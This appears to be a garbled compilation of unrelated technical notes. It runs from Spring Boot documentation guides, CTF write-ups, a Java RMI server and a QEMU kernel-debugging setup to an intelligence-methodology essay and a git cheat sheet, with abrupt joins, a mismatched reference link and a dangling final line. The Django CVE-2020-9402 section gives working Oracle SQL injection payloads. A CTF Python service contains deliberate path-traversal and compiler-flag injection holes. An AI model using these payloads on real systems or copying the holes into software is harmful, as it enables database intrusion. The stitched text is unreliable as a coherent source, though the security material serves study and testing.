After running the test case above, the src directory of the current project contains the output: this approach produces 4 separate static files.

**Output to a single file**

If you don't want the result split up, replace toFolder(Paths.get("src/docs/asciidoc/generated")) with toFile(Paths.get("src/docs/asciidoc/generated/all")) to write the conversion result into a single file, so that the final generated HTML is a single file as well.

**Via the Maven plugin**

Besides writing Java code as above, swagger2markup also provides a corresponding Maven plugin. The generation above can equally be achieved by adding the following plugin to pom.xml:

```xml
<plugin>
    <groupId>io.github.swagger2markup</groupId>
    <artifactId>swagger2markup-maven-plugin</artifactId>
    <version>1.3.3</version>
    <configuration>
        <swaggerInput>http://localhost:8080/v2/api-docs</swaggerInput>
        <outputDir>src/docs/asciidoc/generated-by-plugin</outputDir>
        <config>
            <swagger2markup.markupLanguage>ASCIIDOC</swagger2markup.markupLanguage>
        </config>
    </configuration>
</plugin>
```

Before generating with the plugin, start the application first. Then run the plugin, and the same adoc files as above appear under src/docs/asciidoc/generated-by-plugin.

**Generating HTML**

Having converted the Swagger spec into AsciiDoc sources, the next step is turning the AsciiDoc into deployable HTML. Continuing with the same project, introduce another Maven plugin:

```xml
<plugin>
    <groupId>org.asciidoctor</groupId>
    <artifactId>asciidoctor-maven-plugin</artifactId>
    <version>1.5.6</version>
    <configuration>
        <sourceDirectory>src/docs/asciidoc/generated</sourceDirectory>
        <outputDirectory>src/docs/asciidoc/html</outputDirectory>
        <backend>html</backend>
        <sourceHighlighter>coderay</sourceHighlighter>
        <attributes>
            <toc>left</toc>
        </attributes>
    </configuration>
</plugin>
```

With this configuration, run the plugin's asciidoctor:process-asciidoc goal and the final deployable static HTML is generated under src/docs/asciidoc/html. Open it in a browser to see the statically deployed result.

## Getting the Request Mapping List Back in the Startup Log

A Spring web application prints, at startup, the list of HTTP interfaces created by the application. These log entries are produced by the org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping class, which at startup scans Spring MVC's @Controller, @RequestMapping and related annotations to discover all interfaces the application provides, and then prints them in the log so developers can check whether the interfaces came up correctly.

From Spring Boot 2.1.0 onward, this information is no longer printed, and the full startup log became very short.

**Bringing the request path list back**

Why does Spring Boot 2.1.x no longer print the request path list? Mainly because the log level of these messages was changed from INFO to TRACE. So, to print them at startup, just raise the log level for the RequestMappingHandlerMapping class in the configuration, e.g. add this line to application.properties:

```conf
logging.level.org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping=trace
```

Restart the application with this configuration and the extra log lines appear again.

---

## Generating Swagger Documentation with SpringFox 3

Create a Spring Boot project and add the dependency to pom.xml:

```xml
<dependency>
    <groupId>io.springfox</groupId>
    <artifactId>springfox-boot-starter</artifactId>
    <version>3.0.0</version>
</dependency>
```

Add the @EnableOpenApi and @EnableWebMvc annotations to the application main class:

```java
@EnableWebMvc
@EnableOpenApi
@SpringBootApplication
public class DemoApplication {

    public static void main(String[] args) {
        SpringApplication.run(DemoApplication.class, args);
    }

}
```

Configure some example interfaces:

```java
@Api(tags = "User management")
@RestController
public class UserController {

    @ApiOperation("Create a user")
    @PostMapping("/users")
    public User create(@RequestBody @Valid User user) {
        return user;
    }

    @ApiOperation("User details")
    @GetMapping("/users/{id}")
    public User findById(@PathVariable Long id) {
        return new User("bbb", 21, "Shanghai", "aaa@bbb.com");
    }

    @ApiOperation("User list")
    @GetMapping("/users")
    public List<User> list(@ApiParam("page index") @RequestParam int pageIndex,
                           @ApiParam("entries per page") @RequestParam int pageSize) {
        List<User> result = new ArrayList<>();
        result.add(new User("aaa", 50, "Beijing", "aaa@ccc.com"));
        result.add(new User("bbb", 21, "Guangzhou", "aaa@ddd.com"));
        return result;
    }

    @ApiIgnore
    @DeleteMapping("/users/{id}")
    public String deleteById(@PathVariable Long id) {
        return "delete user : " + id;
    }

}

@Data
@NoArgsConstructor
@AllArgsConstructor
@ApiModel("Basic user information")
public class User {

    @ApiModelProperty("name")
    @Size(max = 20)
    private String name;

    @ApiModelProperty("age")
    @Max(150)
    @Min(1)
    private Integer age;

    @NotNull
    private String address;

    @Pattern(regexp = "^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\\.[a-zA-Z0-9_-]+)+$")
    private String email;

}
```

Start the application and visit the swagger page: http://localhost:8080/swagger-ui/index.html

SpringFox 3 removed the original default swagger 
UI path http://host/context-path/swagger-ui.html and added two new accessible paths: http://host/context-path/swagger-ui/index.html and http://host/context-path/swagger-ui/

By adjusting the log level you can also see that the new version adds a new documentation endpoint: besides the old /v2/api-docs, there is now a /v3/api-docs endpoint as well.

---

## Extending XML Requests and Responses with Message Converters

Spring Boot handles HTTP requests via Spring MVC, which has the concept of a message converter: the component responsible for handling request data in various formats and converting it into objects, for a better programming experience.

Spring MVC defines the HttpMessageConverter interface, abstracting how a converter decides which types it can handle, whether it can read or write them, and the read/write operations themselves:

```java
public interface HttpMessageConverter<T> {

    boolean canRead(Class<?> clazz, @Nullable MediaType mediaType);

    boolean canWrite(Class<?> clazz, @Nullable MediaType mediaType);

    List<MediaType> getSupportedMediaTypes();

    T read(Class<? extends T> clazz, HttpInputMessage inputMessage)
            throws IOException, HttpMessageNotReadableException;

    void write(T t, @Nullable MediaType contentType, HttpOutputMessage outputMessage)
            throws IOException, HttpMessageNotWritableException;

}
```

HTTP requests come with Content-Type values in many formats; to support XML message conversion, the corresponding converter must be used. Spring MVC already ships a Jackson-based converter, MappingJackson2XmlHttpMessageConverter.

**Adding the XML message converter**

In a traditional Spring application, message conversion for XML data can be added with the following configuration:

```java
@Configuration
public class MessageConverterConfig1 extends WebMvcConfigurerAdapter {

    @Override
    public void configureMessageConverters(List<HttpMessageConverter<?>> converters) {
        Jackson2ObjectMapperBuilder builder = Jackson2ObjectMapperBuilder.xml();
        builder.indentOutput(true);
        converters.add(new MappingJackson2XmlHttpMessageConverter(builder.build()));
    }

}
```

A Spring Boot application does not need all that: just add the jackson-dataformat-xml dependency, and Spring Boot pulls in the MappingJackson2XmlHttpMessageConverter implementation automatically:

```xml
<dependency>
    <groupId>com.fasterxml.jackson.dataformat</groupId>
    <artifactId>jackson-dataformat-xml</artifactId>
</dependency>
```

The annotations used to map XML data onto object properties also live in this dependency, so it is required in any case.

**Mapping objects to XML**

With the groundwork done, define the Java object corresponding to the XML content, for example:

```java
@Data
@NoArgsConstructor
@AllArgsConstructor
@JacksonXmlRootElement(localName = "User")
public class User {

    @JacksonXmlProperty(localName = "name")
    private String name;

    @JacksonXmlProperty(localName = "age")
    private Integer age;

}
```

Here @Data, @NoArgsConstructor and @AllArgsConstructor are lombok annotations that simplify the code, mainly generating getters, setters and constructors; @JacksonXmlRootElement and @JacksonXmlProperty maintain the mapping between object properties and the XML.

The User object configured above maps to XML like this:

```xml
<User>
    <name>aaaa</name>
    <age>10</age>
</User>
```

**An endpoint that accepts XML requests**

With the object to convert in place, write an endpoint that accepts XML and returns XML, for example:

```java
@Controller
public class UserController {

    @PostMapping(value = "/user",
            consumes = MediaType.APPLICATION_XML_VALUE,
            produces = MediaType.APPLICATION_XML_VALUE)
    @ResponseBody
    public User create(@RequestBody User user) {
        user.setName("didispace.com : " + user.getName());
        user.setAge(user.getAge() + 100);
        return user;
    }

}
```

---

## Source & Reference

- [Spring Boot 2.x basics: building a RESTful API with unit tests](https://blog.didispace.com/spring-boot-learning-21-2-1/)
- [Spring Boot 2.x basics: building powerful API documentation with Swagger2](https://blog.didispace.com/spring-boot-learning-21-2-2/)
- [Spring Boot 2.x basics: request parameter validation with JSR-303](https://blog.didispace.com/spring-boot-learning-21-2-3/)
- [Elegant parameter validation with Bean Validation in Spring Boot](https://blog.csdn.net/w57685321/article/details/106783433)
- [Spring Boot 2.x basics: Swagger interface grouping and element ordering explained](https://blog.didispace.com/spring-boot-learning-21-2-4/)
- [Spring Boot 2.x basics: generating static Swagger documentation](https://blog.didispace.com/spring-boot-learning-21-2-5/)
- [Spring Boot 2.x basics: getting the request path list back in the startup log](https://blog.didispace.com/spring-boot-learning-21-2-6/)
- [Spring Boot 2.x basics: generating Swagger documentation with SpringFox 3](https://blog.didispace.com/spring-boot-learning-21-2-7/)
- 
[Spring Boot 2.x basics: extending XML requests and responses](https://blog.didispace.com/spring-boot-learning-21-2-8/)
# Computer Networks

- [Overview](计算机网络%20-%20概述.md)
- [Physical Layer](计算机网络%20-%20物理层.md)
- [Link Layer](计算机网络%20-%20链路层.md)
- [Network Layer](计算机网络%20-%20网络层.md)
- [Transport Layer](计算机网络%20-%20传输层.md)
- [Application Layer](计算机网络%20-%20应用层.md)

## References

- Computer Networks, Xie Xiren
- James F. Kurose, Keith W. Ross. Computer Networking: A Top-Down Approach [M]. China Machine Press, 2014.
- W. Richard Stevens. TCP/IP Illustrated, Volume 1: The Protocols [M]. China Machine Press, 2006.
- [Active vs Passive FTP Mode: Which One is More Secure?](https://securitywing.com/active-vs-passive-ftp-mode/)
- [Active and Passive FTP Transfers Defined - KB Article #1138](http://www.serv-u.com/kb/1138/active-and-passive-ftp-transfers-defined)
- [Traceroute](https://zh.wikipedia.org/wiki/Traceroute)
- [ping](https://zh.wikipedia.org/wiki/Ping)
- [How DHCP works and DHCP Interview Questions and Answers](http://webcache.googleusercontent.com/search?q=cache:http://anandgiria.blogspot.com/2013/09/windows-dhcp-interview-questions-and.html)
- [What is process of DORA in DHCP?](https://www.quora.com/What-is-process-of-DORA-in-DHCP)
- [What is DHCP Server ?](https://tecadmin.net/what-is-dhcp-server/)
- [Tackling emissions targets in Tokyo](http://www.climatechangenews.com/2011/html/university-tokyo.html)
- [What does my ISP know when I use Tor?](http://www.climatechangenews.com/2011/html/university-tokyo.html)
- [Technology-Computer Networking[1]-Computer Networks and the Internet](http://www.linyibin.cn/2017/02/12/technology-ComputerNetworking-Internet/)
- [Overview of P2P networks](http://slidesplayer.com/slide/11616167/)
- [Circuit Switching (a) Circuit switching. (b) Packet switching.](http://slideplayer.com/slide/5115386/)
# Hummel (misc, 100p, 56 solved)

In this challenge we get a [video](challenge.mp4) with a farting unicorn. It's easy to notice that there are short and long farts, with gaps of silence in between. The first observation could point to some binary encoding, but the second one suggests something like Morse code - and that turns out to be the right guess.

![](morse.png)

We extracted the soundtrack, loaded it into Audacity and transcribed the code:

`.--. --- . - .-. -.-- .. -. ... .--. .. .-. . -.. -... -.-- -... .- -.- . -.. -... . .- -. ...`

which gives the flag: `hackover18{poetry inspired by baked beans}`
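Decoding can of course be scripted too. A minimal lookup-table decoder (the word boundaries in the flag were guessed by hand, since the recording only marks letter gaps):

```python
MORSE = {
    '.-': 'a', '-...': 'b', '-.-.': 'c', '-..': 'd', '.': 'e', '..-.': 'f',
    '--.': 'g', '....': 'h', '..': 'i', '.---': 'j', '-.-': 'k', '.-..': 'l',
    '--': 'm', '-.': 'n', '---': 'o', '.--.': 'p', '--.-': 'q', '.-.': 'r',
    '...': 's', '-': 't', '..-': 'u', '...-': 'v', '.--': 'w', '-..-': 'x',
    '-.--': 'y', '--..': 'z',
}
code = (".--. --- . - .-. -.-- .. -. ... .--. .. .-. . -.. "
        "-... -.-- -... .- -.- . -.. -... . .- -. ...")
print(''.join(MORSE[c] for c in code.split()))  # poetryinspiredbybakedbeans
```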
# H4CK1NG G00GL3 Writeups for the [H4CK1NG G00GL3 CTF](https://h4ck1ng.google/). The CTF was accompanied by a series of [videos](https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H) (or vice versa 🙂). ![](images/main_chal.png) ![](images/loot.png)
// Minimal Java RMI server: starts an RMI registry in this JVM on the default
// port 1099 and binds a remote object under the name "refObj".
// (Calc is assumed to be defined elsewhere as an exported Remote implementation;
// its source is not part of this file.)
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;

public class RemoteRMIServer {

    private void start() throws Exception {
        // Install a SecurityManager if none is present (needed by some RMI
        // setups, e.g. when remote classes are loaded from a codebase)
        if (System.getSecurityManager() == null) {
            System.out.println("setup SecurityManager");
            System.setSecurityManager(new SecurityManager());
        }
        Calc h = new Calc();
        // Create the registry and register the remote object under "refObj"
        LocateRegistry.createRegistry(1099);
        Naming.rebind("refObj", h);
    }

    public static void main(String[] args) throws Exception {
        new RemoteRMIServer().start();
    }
}
# 1 - Basic Analysis

---

Target: T1.exe. Open the file with IDA.

**Finding the main function**

First, run the program. It asks for an input string; entering 1 makes it exit directly. So the challenge is to find the correct input that makes the program print something other than "you are wrong!".

The entry function of a C program is main, but the `main` symbol name was stripped at compile time. How do we find main among the 5385 functions in this binary? This is where the string-location trick from the code-location toolbox comes in.

From running T1.exe we already know the program prints strings such as

```
Hi CTFer,Input your flag:
you are wrong!
```

We can search for these strings to find the code that references them.

Menu View -> Open SubViews -> Strings, press Ctrl+F, type "Hi CTFer", and double-click to jump to the matching location.

Click the `aHiCtferInputYo` symbol name and press X to find the code that references it, then jump to the target.

The jump lands in assembly; press Tab to convert this code into pseudocode.

From the logic of the pseudocode we can infer:

- sub_45A1C0 is main
- sub_456502 is printf or puts
- sub_4554EF is scanf
- sub_454086 is strcmp

The reconstructed result looks roughly like the sketch below.

If the input equals flag{YOU_FIND_IT}, strcmp returns 0; otherwise it returns non-zero. When strcmp returns 0, the program executes printf("you are right!\n");

---

**Source & Reference**

- [Reverse engineering for beginners — T1: opening IDA the right way](https://mp.weixin.qq.com/s/I9vJp8fp7RcCls0tz8Dvlg)
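A minimal Python sketch of the recovered logic (the decompiled C lives in the screenshots; the prompt strings and the flag constant are the ones identified above):

```python
# hypothetical reconstruction of sub_45A1C0 (main)
flag = "flag{YOU_FIND_IT}"
s = input("Hi CTFer,Input your flag:")
if s == flag:              # strcmp(...) == 0
    print("you are right!")
else:
    print("you are wrong!")
```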
# Off the rails Category: Cryptography ## Description > ht35cn3tk_u}eib34tBcto{R7H_sn_e ## Solution The name of the challenge is a hint for the cipher used to encrypt the flag: Rail Fence Cipher. [This](https://www.boxentriq.com/code-breaking/rail-fence-cipher) site can decode it using 5 rails and an offset of 3: `cstechnion{b3tt3R_74k3_tHe_Bu5}`.
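The decryption can also be scripted. In the sketch below the offset is interpreted as the starting position inside the zigzag cycle - an assumption, but one that reproduces this exact ciphertext:

```python
def rail_decode(ct, rails=5, offset=3):
    cycle = 2 * (rails - 1)
    # row index of each ciphertext position along the zigzag
    rows = [(i + offset) % cycle for i in range(len(ct))]
    rows = [p if p < rails else cycle - p for p in rows]
    out, pos = [''] * len(ct), 0
    for r in range(rails):          # refill the rails row by row
        for i, row in enumerate(rows):
            if row == r:
                out[i] = ct[pos]
                pos += 1
    return ''.join(out)

print(rail_decode("ht35cn3tk_u}eib34tBcto{R7H_sn_e"))
# cstechnion{b3tt3R_74k3_tHe_Bu5}
```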
# Django GIS functions and aggregates on Oracle SQL Injection Vulnerability (CVE-2020-9402)

[中文版本(Chinese version)](README.zh-cn.md)

Django released a security update on March 4, 2020, which fixes a SQL injection vulnerability in the GIS functions and aggregates on the Oracle backend.

Reference link:

- https://www.djangoproject.com/weblog/2020/mar/04/security-releases/

Triggering the vulnerability requires that untrusted input reaches the `tolerance` parameter of a GIS function or aggregate on an Oracle database. The demo application below exposes two views that pass a GET parameter into such queries, which gives us an easy way to reproduce the vulnerability.

## Start Vulnerability Application

Compile and start a vulnerable Django 3.0.3 by executing the following command:

```
docker compose build
docker compose up -d
```

After the environment is started, you can see the home page of Django at `http://your-ip:8000`.

## Vulnerability Reproduction

First, access the page `http://your-ip:8000/vuln/`.

Then pass `20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1` as the `q` GET parameter, which flows into the queryset:

http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

You can see that the closing parenthesis has been injected successfully and the SQL statement throws an error:

![](1.png)

Alternatively, access the other page `http://your-ip:8000/vuln2/` and pass `0.05))) FROM "VULN_COLLECTION2"  where  (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null  --` as the `q` GET parameter:

http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--

Again, the SQL statement throws an error:

![](2.png)
# QEMU Emulation Environment

This chapter introduces how to set up a debugging and analysis environment with QEMU. In order to boot and debug a kernel with QEMU, we need the kernel, QEMU itself, and a file system.

## Preparation

### Kernel

This was already compiled earlier.

### QEMU

For an introduction to QEMU and how to install it, see `ctf-tools`.

### File system

Here we use busybox to build a simple file system.

#### Download and compile busybox

##### Download busybox

```bash
❯ wget https://busybox.net/downloads/busybox-1.32.1.tar.bz2
❯ tar -jxf busybox-1.32.1.tar.bz2
```

##### Configure

```bash
❯ make menuconfig
```

In Settings, select "Build static binary (no shared libs)" so that busybox is compiled as a statically linked binary; in "Linux System Utilities", deselect "Support mounting NFS file systems on Linux < 2.6.23 (NEW)"; in "Networking Utilities", deselect "inetd".

##### Compile

```bash
make -j3
```

#### Configure the file system

Create the `_install` directory with busybox, using:

```bash
make install
```

After compilation finishes, create the following directories under `_install`:

```bash
❯ mkdir -p proc sys dev etc/init.d
```

Then create `init` as the Linux startup script, with the following contents:

```bash
#!/bin/sh
echo "INIT SCRIPT"
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
setsid /bin/cttyhack setuidgid 1000 /bin/sh
```

Make the script executable so it can run:

```bash
❯ chmod +x init
```

Afterwards, pack the whole file system from inside the `_install` directory:

```bash
❯ find . | cpio -o --format=newc > ../rootfs.img
5367 blocks
```

Of course, we can also unpack the file system again with:

```shell
cpio -idmv < rootfs.img
```

## Booting the kernel

Here we boot the Linux kernel using the kernel and file system image compiled above. We can start it directly with the following script:

```bash
#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -nographic \
    -kernel ./bzImage \
    -initrd  ./rootfs.img \
    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr" \
    -smp cores=2,threads=1 \
    -cpu kvm64
```

The boot output looks like this:

```bash
Boot took 2.05 seconds

/ $ [    2.265131] tsc: Refined TSC clocksource calibration: 2399.950 MHz
[    2.265561] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2298086d749, max_idle_ns: 440795294037 ns
[    2.266131] clocksource: Switched to clocksource tsc
/ $
/ $ ls
bin      etc      linuxrc  root     sys      usr
dev      init     proc     sbin     tmp
```

When no monitor is configured, we can enter the monitor with `Ctrl-a c`; the monitor provides many commands:

```bash
/ $ QEMU 5.2.0 monitor - type 'help' for more information
(qemu) help
acl_add aclname match allow|deny [index] -- add a match rule to the access control list
acl_policy aclname allow|deny -- set default access control list policy
acl_remove aclname match -- remove a match rule from the access control list
acl_reset aclname -- reset the access control list
acl_show aclname -- list rules in the access control list
...
```

Commonly used qemu options when booting a kernel:

- -m: RAM size, default 384M
- -kernel: path of the kernel image bzImage
- -initrd: the initial RAM file system used at kernel boot
- `-smp [cpus=]n[,cores=cores][,threads=threads][,dies=dies][,sockets=sockets][,maxcpus=maxcpus]`: number of cores to use.
- -cpu: the processor model to emulate; some protections can be enabled here too, e.g.
    - +smap, enable SMAP
    - +smep, enable SMEP
- -nographic: no graphical interface
- -monitor: redirect the QEMU console; if unset, the console can be entered directly.
- -append: extra kernel command-line options
    - `nokaslr` disables KASLR
    - console=ttyS0, used together with `nographic`, makes the boot console appear in the current terminal.

## Loading a driver

Of course, we can also load the driver compiled earlier. Copy the generated .ko file into busybox's `_install` directory, then modify the startup script by adding `insmod /ko_test.ko`:

```bash
#!/bin/sh
echo "INIT SCRIPT"
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
insmod /ko_test.ko
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
setsid /bin/cttyhack setuidgid 1000 /bin/sh
poweroff -f
```

After qemu boots the kernel, use dmesg to inspect the output; we can see the corresponding ko was indeed loaded:

```
[    2.019440] ko_test: loading out-of-tree module taints kernel.
[    2.020847] ko_test: module verification failed: signature and/or required key missing - tainting kernel
[    2.025423] This is a test ko!
```

## Debugging and analysis

Here we briefly introduce how to debug the kernel.

### Debugging tips

For convenience, we can start the shell as the root user, i.e. modify the corresponding line of the init script:

```shell
- setsid /bin/cttyhack setuidgid 1000 /bin/sh
+ setsid /bin/cttyhack setuidgid 0 /bin/sh
```

In addition, we can disable kernel address randomization at boot time:

```bash
#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -nographic \
    -kernel ./bzImage \
    -initrd  ./rootfs.img \
    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr" \
    -smp cores=2,threads=1 \
    -cpu kvm64
```

### Basic operations

Get the addresses of specific kernel symbols:

```bash
grep prepare_kernel_cred /proc/kallsyms
grep commit_creds /proc/kallsyms
```

List the loaded drivers:

```bash
lsmod
```

Get the base address a driver is loaded at:

```bash
# method 1
grep target_module_name /proc/modules
# method 2
cat /sys/module/target_module_name/sections/.text
```

The /sys/module/ directory stores information about each loaded module.

### Starting a debug session

QEMU actually provides an interface for kernel debugging: add `-gdb dev` to the boot parameters to start a debug service. The most common setup is to listen for a TCP connection on a port. QEMU also provides the shorthand `-s`, which stands for `-gdb tcp::1234`, i.e. it starts a gdbserver on port 1234.

After booting the kernel in debug mode, we can connect to that gdbserver from another terminal and start debugging:

```bash
gdb -q -ex "target remote localhost:1234"
```

Once the kernel is up, we can use `add-symbol-file` to add symbol information, for example:

```
add-symbol-file vmlinux addr_of_vmlinux
add-symbol-file ./your_module.ko addr_of_ko
```

Of course, we can also add source directory information. From there on it is no different from user-space debugging.

## References

- https://www.ibm.com/developerworks/cn/linux/l-busybox/index.html
- https://qemu.readthedocs.io/en/latest/system/qemu-manpage.html
- http://blog.nsfocus.net/gdb-kgdb-debug-application/
---
title: Perspectives on Intelligence Collection
---

# Intelligence Research Methodology — Perspectives on Intelligence Collection

This post collects some methodology notes on intelligence research, mainly reflections arising from intelligence collection work; more methodology notes will follow in later updates. Intelligence studies is an "old" discipline, while threat intelligence is its newborn offspring in today's cyberspace. Studying threat intelligence therefore requires some grounding in the methodology of intelligence research.

## Intelligence collection sources

Below is a classification of intelligence collection from an analyst's point of view, divided mainly into literal (textual) intelligence and non-literal intelligence.

![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200915072210.png)

Figure: Analyst's Functional View of Intelligence Collection [1]

## Structure and process of intelligence collection

### The cycle view

Intelligence collection is usually described as a cycle. Below is a process view of collection, which splits it into a "front end" and a "back end":

- Front end: requirements and tasking
- Middle action: collection
- Back end: exploitation, processing, and dissemination

![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200915073439.png)

Figure 1: Collector's Process View [1]

As shown above, intelligence collection is abstracted into a standard cycle, but in practice the cycle is likely imperfect, with occasional "jumps". Overall, the collection process in Figure 1 is a simplified, idealized version.

### The modular view

Below is a modular view of the collection process. In this view, the different collection disciplines are treated as separate pipelines ("stovepipes"), each of which is a variant of Figure 1 — that is, each discipline/module runs its own standalone cycle, and each pipeline produces a different intelligence product. This view is finer-grained and more instructive for analysts.

![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200915073719.png)

Figure 2: Analyst's Process View [1]

### Targeted collection

Another approach is "boutique" collection of only the needed parts of a source. Usually, though, the cost of such targeted collection — in manpower and in resources — is high, and it demands more exploitation and processing. PS: this may sound puzzling: if we collect selectively, shouldn't what we collect already be high quality? My understanding is that targeted collection is like selecting raw materials for a luxury product: because of the product's positioning and requirements, the "boutique" demands not only higher-grade raw material but also more meticulous processing — good inputs alone are not enough.

As shown in Figure 2, the golden-orange parts are usually mass collection, while the blue parts are this targeted collection, which requires more direct analyst involvement.

## Boundary issues

### Single-source analysis

In the United States, national intelligence collection organizations perform so-called single-source analysis. [1] Simply put, each agency is responsible for collecting and analyzing one type of intelligence: the National Security Agency (NSA) collects and analyzes communications intelligence (COMINT), the National Geospatial-Intelligence Agency (NGA) collects and processes imagery intelligence (IMINT), and the Open Source Center (OSC) collects and processes open-source intelligence (OSINT). For these bodies, anything beyond their primary discipline is collateral intelligence.

### All-source analysis

> Some national agencies and military service units are responsible for producing all-source analysis. For example, the Central Intelligence Agency (CIA), the Defense Intelligence Agency (DIA), the Department of Homeland Security (DHS) and the State Department are responsible for providing all-source analysis at the national level. [1]

Generally speaking, the bodies doing all-source analysis at the national level are more likely to be central national institutions and military organizations rather than specialized functional departments.

### The resulting boundary problems

So what effects does this single-source/all-source distinction have?

- Single-source analysts' products help all-source analysts, and the latter usually carry the larger workload.
- Competitive analysis: this idea is built around taking fresh, different viewpoints on the raw material. [1] For the same data set, different perspectives will rank different things as important.
- Multi-INT fusion: there is good reason to encourage, rather than discourage, single-source analysts' tendency to move toward all-source analysis. [1]
- A single-source analyst struggles to fulfil the target requirement with only a single data source.

### Personal reflections

The multi-INT fusion and competitive-analysis concepts mentioned in the paper can serve as references when building a new kind of intelligence-analysis system. Back in our threat-intelligence world, these single-source/multi-source boundary problems show up all the time. For example, an analyst researching black/gray-market intelligence may also look at some vulnerability intelligence, because part of the business-logic information in vulnerability intelligence helps with black-market discovery. So how can we push forward the construction of such a multi-INT fusion system?

Personally, I think it has to be viewed from two angles: first purpose, then outcome.

In terms of purpose, we must be clear about what the fusion is for; it cannot be pushed merely because "this might be useful" — a concrete technical direction has to be given. For the black/gray-market research line, for instance, we can chain together: black-market discovery intelligence, business risk-control intelligence, black-market takedown (response) intelligence, (part of) vulnerability intelligence, and third-party threat-intelligence support. After chaining them, threat exchange has to happen, pushing the multi-source intelligence toward fusion and correlation. Concretely how? The paper's "competitive analysis" concept is a good reference: once a black/gray-market analysis requirement arrives, every party on the research line should analyze the same raw material from its own domain — and also try brand-new, different viewpoints.

Under this process, the single-source side is pushed to obtain more material from the multi-source side, and the multi-source side to obtain more ideas from the single-source side, thereby reducing the downsides of the boundary problem.

## Summary

Overall, the paper describes the intelligence collection and processing system of the US intelligence community, and it also raises some issues, mainly boundary and naming problems. As we can see, the US intelligence system involves a large number of participants, and the system is relatively large and mature.

From an enterprise's perspective, studying how such a system is built can yield inspiration from the problems of nation-level intelligence systems, since a nation can also be regarded as a super-large enterprise. My main takeaways from this paper are the concepts of multi-INT fusion and competitive analysis, which are valuable references for building a threat-intelligence system, especially for the localized production and exchange of threat intelligence.

## References

[1] Perspectives on Intelligence Collection, Robert M. Clark, PhD
#!/usr/bin/python import os import hashlib import subprocess import time def menu(): print """ 1. Read Trump article 2. Run Trump Money Simulator 3. Quit """ try: res = int(raw_input()) if res <= 0 or res > 3: return -1 else: return res except: return -1 def read_tweet(): print "Read the top 20 tweets by Trump!" print "Enter a number (1 - 20)" tweet_number = raw_input() time.sleep(5) try: with open("tweets/{0}".format(tweet_number), 'r') as f: print f.read() except: print "Invalid input!" def run_sim(): print "Trump's money simulator (that makes america great again) simulates two different sized states transfering money around, with the awesome Trump algorithm." print "The simulator takes in 2 inputs. Due to the awesomeness of the simulator, we can only limit the input to less than a thousand each..." input1 = raw_input("[Smaller] State 1 Size:") input2 = raw_input("[Larger] State 2 Size:") if len(input1) > 3 or len(input2) >3: print "Number has to be less than 1000" return str_to_hash = "[]{0}[]{1}##END".format(input1,input2) print "Hashing",repr(str_to_hash) sim_id = hashlib.sha256(str_to_hash).hexdigest() sim_name = "sims/sim-{0}".format(sim_id) if False:#os.path.isfile(sim_name): print "Sim compiled, running sim..." else: print "Compiling Sim" args=["clang", "-m32", "-DL1={}".format(input1), "-DL2={}".format(input2), "pound.c", "-o", sim_name] print args ret = subprocess.call(args) if ret != 0: print "Compiler error!" return #os.execve("/usr/bin/sudo", ["/usr/bin/sudo", "-u", "smalluser", sim_name], {}) os.execve(sim_name, [sim_name], {}) def main(): print "Welcome to the Trump Secret Portal" while 1: res = menu() if res == 1: read_tweet() elif res == 2: run_sim() elif res == 3: exit(0) if __name__ == "__main__": main()
# GitHub Branches

### What is a branch?

A branch is like a parallel universe in a sci-fi movie: while you sit at your computer working hard on learning Git, another you is working hard on learning SVN in another parallel universe.

If the two parallel universes never interfere with each other, none of this affects the current you. But at some point in time the two universes merge — and then you have learned both Git and SVN!

![Branch illustration](../img/0.png)

### Branch management

#### List local branches

```
git branch
```

#### List local and remote branches

```
git branch -a
```

> **Tip**: `*` marks the current branch

```
$ git branch -a
  gh-pages
* master
  remotes/origin/gh-pages
  remotes/origin/master
```

> **Tip**: by default, origin points to the GitHub-hosted counterpart of your local repository

#### Create a branch

```
git branch [branch-name]
```

#### Switch to a branch

```
git checkout [branch-name]
```

#### Create and switch to a branch

```
git checkout -b [branch-name]
```

#### Push a branch to the remote

```
git push -u origin [branch-name]
```

#### Delete a local branch

```
git branch -d [branch-name]
```

#### Delete the remote copy of a branch

```
git push origin :[branch-name]
```

#### Delete the remote-tracking branch and the remote branch

```
git branch -r -d origin/[branch-name]
git push origin :[branch-name]
```

#### Merge a given branch into the current branch

```
git merge [branch-name]
```

A typical end-to-end workflow combining these commands is shown after this list of commands.

#### git reset --hard HEAD~

Discard the most recent commit and go back to the previous one

#### git reset --hard HEAD

Discard new, uncommitted changes
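Putting the commands above together, a typical feature-branch round trip looks like this (branch name `feature-x` is just an example):

```
git checkout -b feature-x        # create and switch to a new branch
# ... edit files and commit ...
git push -u origin feature-x     # publish the branch
git checkout master              # go back to master
git merge feature-x              # merge the feature in
git push origin :feature-x       # delete the remote branch
git branch -d feature-x          # delete the local branch
```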
# Minimal SMTP sink: accepts any mail on port 1025 and logs only the Subject
